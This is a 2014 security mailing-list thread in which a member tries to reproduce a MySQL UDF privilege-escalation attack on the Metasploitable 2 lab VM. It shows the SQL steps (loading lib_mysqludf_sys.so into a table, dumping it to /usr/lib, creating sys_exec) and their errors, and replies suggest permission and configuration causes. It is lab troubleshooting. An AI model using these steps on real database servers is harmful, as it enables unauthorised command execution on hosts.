Trying to replicate MySQL root to SYSTEM root on Metasploitable 2
523 views
Skip to first unread message
ar...@openmailbox.org
Jun 27, 2014, 9:13:02 AM6/27/14
to null-...@googlegroups.com
Hello nulls,
I'm trying to replicate attack explained in following link on
metasploitable 2:
http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
For the sake of simplicity, I SCPed lib_mysqludf_sys.so (32 bit fron
sqlmap dir) using msfadmin:msfadmin and made sure that file is present
under '/home/msfadmin/'.
Problem I'm facing is while dumping content of table values into
file(/usr/lib/lib_mysqludf_sys.so).
mysql> create table arjun(line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into arjun
values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from arjun into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1 (HY000): Can't create/write to file
'/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)
Is there anything I'm not doing right?
@
I'm trying to replicate attack explained in following link on
metasploitable 2:
http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
For the sake of simplicity, I SCPed lib_mysqludf_sys.so (32 bit fron
sqlmap dir) using msfadmin:msfadmin and made sure that file is present
under '/home/msfadmin/'.
Problem I'm facing is while dumping content of table values into
file(/usr/lib/lib_mysqludf_sys.so).
mysql> create table arjun(line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into arjun
values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from arjun into dumpfile '/usr/lib/lib_mysqludf_sys.so';
ERROR 1 (HY000): Can't create/write to file
'/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)
Is there anything I'm not doing right?
@
Naresh Annangar
Jun 28, 2014, 9:39:40 AM6/28/14
to null-...@googlegroups.com
Arjun,
Errcode 13 means that you dont have the permission to write into /usr/lib
-- n.
--
_______________________________________________________________________________
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
--- You received this message because you are subscribed to the Google Groups "null" group.
To unsubscribe from this group and stop receiving emails from it, send an email to null-co-in+unsubscribe@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
ar...@openmailbox.org
Jun 30, 2014, 4:54:39 AM6/30/14
to null-...@googlegroups.com, Naresh Annangar
Thank you Naresh.
Thought mysql root user should have permission to write in any location,
unlike regular web application user.
I tried creating file under /tmp folder, but unfortunately it doesn't
look like shared libraries can be opened from any other location than
/usr/lib.
<pre>
mysql> insert into arjun
values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.00 sec)
mysql> select * from arjun into dumpfile '/tmp/lib_mysqludf_sys.so';
Query OK, 2 rows affected (0.00 sec)
mysql> create function sys_exec returns integer soname
'lib_mysqludf_sys.so';
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so'
(errno: 22 lib_mysqludf_sys.so: cannot open shared object file: No such
file or directory)
mysql> create function sys_exec returns integer soname
'/tmp/lib_mysqludf_sys.so';
ERROR 1124 (HY000): No paths allowed for shared library
</pre>
Also on the other hand, original file and file created through dumpfile
differ when checked their md5 hashes.
<pre>
msfadmin@metasploitable:~$ file lib_mysqludf_sys.so
/tmp/lib_mysqludf_sys.so
lib_mysqludf_sys.so: ELF 32-bit LSB shared object, Intel 80386,
version 1 (SYSV), stripped
/tmp/lib_mysqludf_sys.so: data
msfadmin@metasploitable:~$ md5sum lib_mysqludf_sys.so
/tmp/lib_mysqludf_sys.so
844290834b6450425b146d4517cdf780 lib_mysqludf_sys.so
c4103f122d27677c9db144cae1394a66 /tmp/lib_mysqludf_sys.so
</pre>
Any possible solution for this scenario?
@
On 2014-06-28 19:06, Naresh Annangar wrote:
> Arjun,
>
> Errcode 13 means that you dont have the permission to write into
> /usr/lib
>
> -- n.
>
> On Fri, Jun 27, 2014 at 5:27 PM, <ar...@openmailbox.org> wrote:
>
>> Hello nulls,
>>
>> I'm trying to replicate attack explained in following link on
>> metasploitable 2:
>>
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
>> [1]
>> For more options, visit https://groups.google.com/d/optout [3].
> For more options, visit https://groups.google.com/d/optout [3].
>
>
> Links:
> ------
> [1]
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
> [2] http://null.co.in/section/about/null_list_charter/
> [3] https://groups.google.com/d/optout
Thought mysql root user should have permission to write in any location,
unlike regular web application user.
I tried creating file under /tmp folder, but unfortunately it doesn't
look like shared libraries can be opened from any other location than
/usr/lib.
<pre>
mysql> insert into arjun
values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
Query OK, 1 row affected (0.00 sec)
Query OK, 2 rows affected (0.00 sec)
mysql> create function sys_exec returns integer soname
'lib_mysqludf_sys.so';
ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so'
(errno: 22 lib_mysqludf_sys.so: cannot open shared object file: No such
file or directory)
mysql> create function sys_exec returns integer soname
'/tmp/lib_mysqludf_sys.so';
ERROR 1124 (HY000): No paths allowed for shared library
</pre>
Also on the other hand, original file and file created through dumpfile
differ when checked their md5 hashes.
<pre>
msfadmin@metasploitable:~$ file lib_mysqludf_sys.so
/tmp/lib_mysqludf_sys.so
lib_mysqludf_sys.so: ELF 32-bit LSB shared object, Intel 80386,
version 1 (SYSV), stripped
/tmp/lib_mysqludf_sys.so: data
msfadmin@metasploitable:~$ md5sum lib_mysqludf_sys.so
/tmp/lib_mysqludf_sys.so
844290834b6450425b146d4517cdf780 lib_mysqludf_sys.so
c4103f122d27677c9db144cae1394a66 /tmp/lib_mysqludf_sys.so
</pre>
Any possible solution for this scenario?
@
On 2014-06-28 19:06, Naresh Annangar wrote:
> Arjun,
>
> Errcode 13 means that you dont have the permission to write into
> /usr/lib
>
> -- n.
>
> On Fri, Jun 27, 2014 at 5:27 PM, <ar...@openmailbox.org> wrote:
>
>> Hello nulls,
>>
>> I'm trying to replicate attack explained in following link on
>> metasploitable 2:
>>
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
>>
>> For the sake of simplicity, I SCPed lib_mysqludf_sys.so (32 bit
>> fron sqlmap dir) using msfadmin:msfadmin and made sure that file is
>> present under '/home/msfadmin/'.
>>
>> Problem I'm facing is while dumping content of table values into
>> file(/usr/lib/lib_mysqludf_sys.so).
>>
>> mysql> create table arjun(line blob);
>> Query OK, 0 rows affected (0.00 sec)
>>
>> mysql> insert into arjun
>> values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
>> Query OK, 1 row affected (0.00 sec)
>>
>> mysql> select * from arjun into dumpfile
>> '/usr/lib/lib_mysqludf_sys.so';
>> ERROR 1 (HY000): Can't create/write to file
>> '/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)
>>
>> Is there anything I'm not doing right?
>>
>> @
>>
>> --
>>
> _______________________________________________________________________________
>> null - Spreading the right Information
>> null Mailing list charter:
>> http://null.co.in/section/about/null_list_charter/ [2]
>> For the sake of simplicity, I SCPed lib_mysqludf_sys.so (32 bit
>> fron sqlmap dir) using msfadmin:msfadmin and made sure that file is
>> present under '/home/msfadmin/'.
>>
>> Problem I'm facing is while dumping content of table values into
>> file(/usr/lib/lib_mysqludf_sys.so).
>>
>> mysql> create table arjun(line blob);
>> Query OK, 0 rows affected (0.00 sec)
>>
>> mysql> insert into arjun
>> values(load_file('/home/msfadmin/lib_mysqludf_sys.so'));
>> Query OK, 1 row affected (0.00 sec)
>>
>> mysql> select * from arjun into dumpfile
>> '/usr/lib/lib_mysqludf_sys.so';
>> ERROR 1 (HY000): Can't create/write to file
>> '/usr/lib/lib_mysqludf_sys.so' (Errcode: 13)
>>
>> Is there anything I'm not doing right?
>>
>> @
>>
>> --
>>
> _______________________________________________________________________________
>> null - Spreading the right Information
>> null Mailing list charter:
>> --- You received this message because you are subscribed to the
>> Google Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> send an email to null-co-in+...@googlegroups.com.
>> Google Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> For more options, visit https://groups.google.com/d/optout [3].
>
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> ---
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> send an email to null-co-in+...@googlegroups.com.
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> For more options, visit https://groups.google.com/d/optout [3].
>
>
> Links:
> ------
> [1]
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
> [2] http://null.co.in/section/about/null_list_charter/
> [3] https://groups.google.com/d/optout
Akash
Jun 30, 2014, 5:08:04 AM6/30/14
to null-...@googlegroups.com, Naresh Annangar
It could be the app-armour profile
send an email to null-co-in+unsubscribe@googlegroups.com.
For more options, visit https://groups.google.com/d/optout [3].
http://null.co.in/section/about/null_list_charter/ [2]
--
_______________________________________________________________________________
null - Spreading the right Information
null Mailing list charter:
---
You received this message because you are subscribed to the Google
Groups "null" group.
To unsubscribe from this group and stop receiving emails from it,
send an email to null-co-in+unsubscribe@googlegroups.com.
For more options, visit https://groups.google.com/d/optout [3].
Links:
------
[1]
http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
[2] http://null.co.in/section/about/null_list_charter/
[3] https://groups.google.com/d/optout
--
_______________________________________________________________________________
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
--- You received this message because you are subscribed to the Google Groups "null" group.
To unsubscribe from this group and stop receiving emails from it, send an email to null-co-in+unsubscribe@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
Warm regards,
Akash Mahajan
That Web Application Security Guy | +91 99 805 271 82
akashm.com | @makash on twitter | linkd.in/webappsecguy
OWASP Bangalore Chapter Lead | null Community Manager
corrupt
Jun 30, 2014, 6:28:16 AM6/30/14
to null Mailing List, Naresh Annangar
Check whether the following variables are set:
- allow-suspicious-udfs (off by default)
- skip-grant-tables (suppresses user-defined UDF's)
- secure-file-priv (allows write only for the specified path)
Cheers,
corrupt
corrupt
To unsubscribe from this group and stop receiving emails from it, send an email to null-co-in+...@googlegroups.com.
ar...@openmailbox.org
Jul 1, 2014, 3:48:21 AM7/1/14
to null-...@googlegroups.com, Naresh Annangar, corrupt
Okay. Will check that.
Thank you for your inputs.
@
>> http://null.co.in/section/about/null_list_charter/ [2] [2]
>> [2] http://null.co.in/section/about/null_list_charter/ [2]
>> [3] https://groups.google.com/d/optout [3]
> akashm.com [5] | _@makash_ on twitter | linkd.in/webappsecguy [6]
> _OWASP Bangalore Chapter Lead | null Community Manager_
> [5] http://akashm.com
> [6] http://linkd.in/webappsecguy
Thank you for your inputs.
@
>>
>> --- You received this message because you are subscribed to the
>> Google Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> --- You received this message because you are subscribed to the
>> Google Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> send an email to null-co-in+...@googlegroups.com.
>> For more options, visit https://groups.google.com/d/optout [3] [3].
>>
>> --
>>
>>
> _______________________________________________________________________________
>> null - Spreading the right Information
>> null Mailing list charter:
>> http://null.co.in/section/about/null_list_charter/ [2] [2]
>> --
>>
>>
> _______________________________________________________________________________
>> null - Spreading the right Information
>> null Mailing list charter:
>>
>> ---
>> You received this message because you are subscribed to the Google
>> Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> ---
>> You received this message because you are subscribed to the Google
>> Groups "null" group.
>> To unsubscribe from this group and stop receiving emails from it,
>> send an email to null-co-in+...@googlegroups.com.
>> For more options, visit https://groups.google.com/d/optout [3]
>> [3].
>>
>> Links:
>> ------
>> [1]
>>
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
>> [1]
>>
>> Links:
>> ------
>> [1]
>>
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
>> [2] http://null.co.in/section/about/null_list_charter/ [2]
>> [3] https://groups.google.com/d/optout [3]
>
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> --- You received this message because you are subscribed to the
> Google Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> --- You received this message because you are subscribed to the
> Google Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> send an email to null-co-in+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout [3].
>
> --
> Warm regards,
> Akash Mahajan
>
> _That Web Application Security Guy_ | +91 99 805 271 82 [4]
> --
> Warm regards,
> Akash Mahajan
>
> akashm.com [5] | _@makash_ on twitter | linkd.in/webappsecguy [6]
> _OWASP Bangalore Chapter Lead | null Community Manager_
>
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> ---
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> ---
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> send an email to null-co-in+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout [3].
>
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> ---
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
>
> --
>
> _______________________________________________________________________________
> null - Spreading the right Information
> null Mailing list charter:
> http://null.co.in/section/about/null_list_charter/ [2]
> ---
> You received this message because you are subscribed to the Google
> Groups "null" group.
> To unsubscribe from this group and stop receiving emails from it,
> send an email to null-co-in+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout [3].
>
>
> Links:
> ------
> [1]
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
> [2] http://null.co.in/section/about/null_list_charter/
> [3] https://groups.google.com/d/optout
> [4] tel:%2B91%2099%20805%20271%2082
>
>
> Links:
> ------
> [1]
> http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/
> [2] http://null.co.in/section/about/null_list_charter/
> [3] https://groups.google.com/d/optout
> [5] http://akashm.com
> [6] http://linkd.in/webappsecguy
Reply all
Reply to author
Forward
0 new messages